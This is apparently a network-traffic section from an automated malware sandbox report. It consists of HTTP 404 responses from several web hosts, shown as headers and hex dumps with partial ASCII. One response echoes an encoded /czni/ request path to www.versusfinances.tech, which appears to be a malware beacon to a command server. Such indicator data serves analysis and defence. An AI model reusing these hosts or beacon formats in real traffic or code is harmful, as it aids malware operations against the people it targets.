a3 b4 43 33 60 32 f9 4d 70 16 cd ad 19 8f 97 ef 16 84 bf 8b 03 8a e9 a4 93 58 7e 48 09 ff 37 f5 45 c7 c6 36 66 96 da e6 cc 5a 50 36 5f 08 03 27 d6 8c 85 e1 ef 74 23 3a c4 82 bd f1 d4 11 0b 96 62 6a 60 1b db 06 66 96 88 df 13 41 fe f8 f7 cf 1d c3 18 73 2a 56 3c 42 97 e3 0a 8d 4b 27 93 49 05 7b 97 0f cc ef 50 35 5f 62 7f a6 94 c1 b6 8c b1 b0 52 ee 4f 28 16 56 40 67 94 4f 84 a5 b6 37 cc db fd 5f e4 91 68 4a 4c 60 42 f5 4c a7 3f 3e fd 4e e6 ff 43 96 b4 d3 82 c3 b3 65 7c b4 3f c3 a8 69 14 bc 5b b0 30 e8 08 63 37 8b 79 27 9e fc c0 39 79 ea b4 66 21 01 0b 53 16 65 60 61 a5 ab 04 4e d1 74 b2 a5 8f 94 3f 89 05 8b e6 de 2b 1b 17 df 7e da f8 34 11 1f 42 02 ed 3b cc 27 f6 98 bf 89
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:41:32 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-UA-Compatible: IE=edgeLink: <https://londondairysupply.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 65 30 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 43 41 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4c 6f 6e 64 6f 6e 20 44 61 69 72 79 20 53 75 70 70 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6c 6f 6e 64 6f 6e 64 61 69 72 79 73 75 70 70 6c 79 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 74 72 61 6e 73 6c 61 74 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4c 6f 6e 64 6f 6e 20 44 61 69 72 79 20 53 75 70 70 6c 79 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 6e 64 6f 6e 64 61 69 72 79 73 75 70 70 6c 79 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4c 6f 6e 64 6f 6e 20 44 61 69 72 79 20 53 75 70 70 6c 79 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 6e 64 6f 6e 64 61 69 72 79 73 75 70 70 6c 79 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:41:35 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-UA-Compatible: IE=edgeLink: <https://londondairysupply.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 65 30 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 43 41 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4c 6f 6e 64 6f 6e 20 44 61 69 72 79 20 53 75 70 70 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6c 6f 6e 64 6f 6e 64 61 69 72 79 73 75 70 70 6c 79 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 74 72 61 6e 73 6c 61 74 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4c 6f 6e 64 6f 6e 20 44 61 69 72 79 20 53 75 70 70 6c 79 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 6e 64 6f 6e 64 61 69 72 79 73 75 70 70 6c 79 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4c 6f 6e 64 6f 6e 20 44 61 69 72 79 20 53 75 70 70 6c 79 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 6e 64 6f 6e 64 61 69 72 79 73 75 70 70 6c 79 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 30 Jan 2023 12:41:46 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 8f d3 30 10 bd ef af f0 06 a1 82 68 92 ee 0d b5 c9 1e 80 b2 02 c1 66 a5 56 42 48 5c 9c 78 92 cc 6e 62 47 b6 d3 b4 8b f8 ef 4c 9c 56 6a 69 96 f6 52 79 3e de b3 df 9b 49 74 fd 29 f9 b8 fe f9 b0 64 a5 ad ab db ab 68 f8 63 51 09 5c dc 5e 31 16 d5 60 39 cb 4a ae 0d d8 d8 6b 6d ee bf f7 5c c2 d8 5d 05 cc ee 1a 88 3d 0b 5b 1b 66 c6 b8 8c 83 9a b2 54 89 dd 94 bd 6a b8 b6 12 f4 94 61 ae 79 0d ec 37 81 9e fe 4a c0 a2 b4 f3 9b d9 ec f5 e2 2c d9 a1 b0 e5 0b b9 9a eb 02 e5 7c 76 de d5 70 21 50 16 63 a9 54 69 01 7a 2c a3 5a 5b a1 84 b1 54 ae a4 f5 0d 3e c3 0b 37 d9 80 b6 98 f1 ca e7 15 16 72 9e 72 03 3d d4 f9 c5 52 9e 3d 15 5a b5 52 cc ad e6 d2 90 3a 20 ed 69 dd 9f 13 11 7a 19 47 44 53 44 99 57 aa 9b 97 28 04 c8 73 84 28 74 06 1d 79 48 6f 20 ae d8 bb 4f 7e 78 4c 92 17 b1 07 db 06 35 0c b6 ed 9d 3e 54 a1 14 b0 9d b2 5c 55 c4 32 65 bc aa 0e 4d 77 49 72 f7 6d f9 21 59 0f 73 30 0c c8 e5 36 ad 52 65 f7 54 d7 be cf 3e 3b 64 72 89 7d a7 11 f3 d7 bc 60 39 6e c1 30 43 42 52 d8 47 63 5a 3a 2a c9 6a 95 22 cd 9a 80 0d 66 14 f1 fd 91 57 b9 41 89 87 12 df 1d 16 0c 25 5a 24 57 7a 44 88 6f 82 d9 82 d5 7c 8b 75 5b 1f 87 5a 03 da 9d 79 4a 55 b3 c5 e1 9d 1b 84 ae 51 da f6 cf 8c c2 fd 42 44 bd 1f 8e 5e e0 86 a1 88 bd fd 80 0f 62 84 14 75 59 93 69 6c ec f1 7a 3c f2 0d 1f a2 c3 96 08 95 b5 35 19 12 74 1a 2d bc 39 31 fd b0 20 93 e8 bf 38 ac e2 b2 68 79 41 4e 7e 25 f4 95 e3 f4 26 a3 50 07 c8 77 6c 62 74 16 7b 61 68 40 28 ba fc 13 69 1d 64 aa 0e 73 5d f7 c7 f0 52 7f 47 a3 a1 ba a0 52 19 b7 a8 64 50 2a 63 19 c1 5e 6c 9c 7c 49 ee 93 d5 c3 40 b9 5c 5d e2 99 84 fd 75 82 47 9a 99 f1 52 e2 8c 7e 85 83 42 ff 94 bc ed 17 82 56 c0 29 e2 fc 1b 7c 23 1f fb ef dc 5f c7 6f 3e a9 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TM0hfVBH\xnbGLVjiRy>It)dhcQ\^1`9Jkm\]=[fTjay7J,|vp!PcTiz,Z[T>7rr=R=ZR: izGDSDW(s(tyHo O~xL5>T\U2eMwIrm!Ys06ReT>;dr}`9n0CBRGcZ:*j"fWA%Z$WzDo|u[ZyJUQBD^buYilz<5t-91 8hyAN~%&Pwlbt{ah@(ids]RGRdP*c^l|I@\]uGR~BV)|#_o>0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Mon, 30 Jan 2023 12:41:49 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 244content-encoding: gzipvary: Accept-Encoding,User-Agentdate: Mon, 30 Jan 2023 12:41:54 GMTserver: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff 04 c1 b1 0d c0 20 0c 04 c0 9e 29 7e 02 58 00 51 27 6d 36 40 c4 08 37 b6 84 01 4b 99 3e 77 a9 7d c2 09 5e 0d a2 0b 5d b7 bc 50 c1 1a 6c 30 9a 87 66 0c f9 7a 4a c8 77 71 f7 78 68 da b6 ce 52 a5 91 c5 45 6d fc 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 46 2f cf 6b e4 01 00 00 Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y# )~XQ'm6@7K>w}^]Pl0fzJwqxhREmwwF/k
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 611date: Mon, 30 Jan 2023 12:41:57 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 7a 6e 69 2f 3f 32 30 3d 34 78 66 50 69 76 33 52 6e 45 26 61 6d 70 3b 7a 38 72 75 6c 2d 6e 3d 6a 5a 33 61 56 56 73 4f 50 43 51 38 7a 44 6f 6c 77 66 50 4d 4a 30 46 67 79 41 53 4f 64 6c 54 2b 70 55 55 5a 57 47 6c 75 78 7a 65 4a 69 76 72 66 43 7a 58 34 2b 37 6a 65 54 6c 50 69 6b 68 31 47 37 50 50 2b 35 47 36 56 39 45 51 70 47 51 54 33 75 48 73 4b 34 62 4c 69 65 37 46 64 43 30 62 34 70 77 3d 3d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 76 65 72 73 75 73 66 69 6e 61 6e 63 65 73 2e 74 65 63 68 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /czni/?20=4xfPiv3RnE&amp;z8rul-n=jZ3aVVsOPCQ8zDolwfPMJ0FgyASOdlT+pUUZWGluxzeJivrfCzX4+7jeTlPikh1G7PP+5G6V9EQpGQT3uHsK4bLie7FdC0b4pw== was not found on this server.<HR><I>www.versusfinances.tech</I></BODY></HTML>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 30 Jan 2023 12:42:07 GMTserver: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.0.30content-length: 203content-type: text/html; charset=iso-8859-1connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 7a 6e 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /czni/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 30 Jan 2023 12:42:09 GMTserver: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.0.30content-length: 203content-type: text/html; charset=iso-8859-1connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 7a 6e 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /czni/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:42:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qli%2BxEDjmLkYhchRvDrr074cTc9eMZY83d73NAVWZzvTZwZhsWIlzncpTM4l3hJ1RrfIspzXd%2BqHuWC4038gwPm6w68qgBI8OHSEyQncXNeI7C8UmvAIBsEEaOmHCDGcTD%2B3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 791a4953bf1106e5-LHRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 64 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 53 4d 6f db 38 10 bd fb 57 4c 59 60 4f a5 e5 b8 2d b0 70 25 01 41 92 76 7b 68 52 34 2d b0 3d 8e c4 89 44 98 22 59 72 64 c7 ff be a0 f5 11 27 4d 7b aa 0e 96 c8 79 f3 66 de 9b 71 fe e2 f2 e6 e2 eb f7 cf 57 d0 72 67 ca 45 9e 5e 60 d0 36 85 20 2b d2 05 a1 2a 17 00 00 39 6b 36 54 be 59 bd 81 cf e7 1f ae e0 fa e6 2b bc bf f9 76 7d 99 67 43 64 31 c0 5e 48 09 9f 88 11 a4 1c 13 bb 74 aa 5b 0c 91 b8 10 3d df c9 7f c5 69 a8 65 f6 92 7e f4 7a 57 88 ff e5 b7 73 79 e1 3a 8f ac 2b 43 02 6a 67 99 2c 17 e2 e3 55 41 aa a1 47 99 73 70 af 15 b7 c5 d9 7a b5 7a 05 da 6a d6 68 64 ac d1 50 71 26 c0 62 47 85 d8 69 da 7b 17 78 22 48 7d 3e 61 99 21 cf 11 8b f2 a9 a2 09 33 55 50 14 eb a0 3d 6b 67 c5 1f 81 d8 73 eb 82 38 75 ec 3d ee 74 ed ec 43 09 a3 ed 16 02 99 42 c4 d6 05 ae 7b 86 04 10 d0 06 ba 2b c4 dd 80 5f ea da 3d e2 b9 b8 bd 85 0f c6 55 68 20 b9 d8 9b e8 c2 e1 59 56 3e 18 8a 2d 11 4f 94 75 8c 59 e5 1c 47 0e e8 97 7b aa 96 9d b6 cb 3a c6 51 cc 09 c3 43 42 a0 e8 9d 8d 7a 47 29 21 81 7f a5 e7 83 a7 42 30 dd 73 36 b0 e5 d9 b0 56 79 e5 d4 a1 5c 2c 72 8b 3b a8 0d c6 58 08 8b bb 0a c3 b1 64 ae f4 7c 9d 3c 44 6d 29 4c ce 9e c4 86 14 99 38 e7 38 40 5e f5 cc ce 8e d5 87 83 78 92 c2 ae 69 d2 92 29 64 1c 0f a9 94 31 e8 e3 7c 8d a1 49 7b fb b2 3b 5c 3f f4 36 d6 88 1e ed c4 99 e6 21 8f f1 3c 4b f7 7f 19 06 bf 79 26 b9 d9 20 71 96 8f 4f b4 56 01 ad 9a 66 fd 52 3c fb 47 c6 d1 dc 4c e9 dd 71 02 c3 47 9e 59 3c 9e 17 bf 1b c9 10 d0 aa 10 ac eb 2d 85 d9 e8 3d 19 03 e9 47 c6 4e c0 71 2b 0a d1 61 68 b4 95 95 63 76 dd e6 ec ad bf 7f 07 1e 95 d2 b6 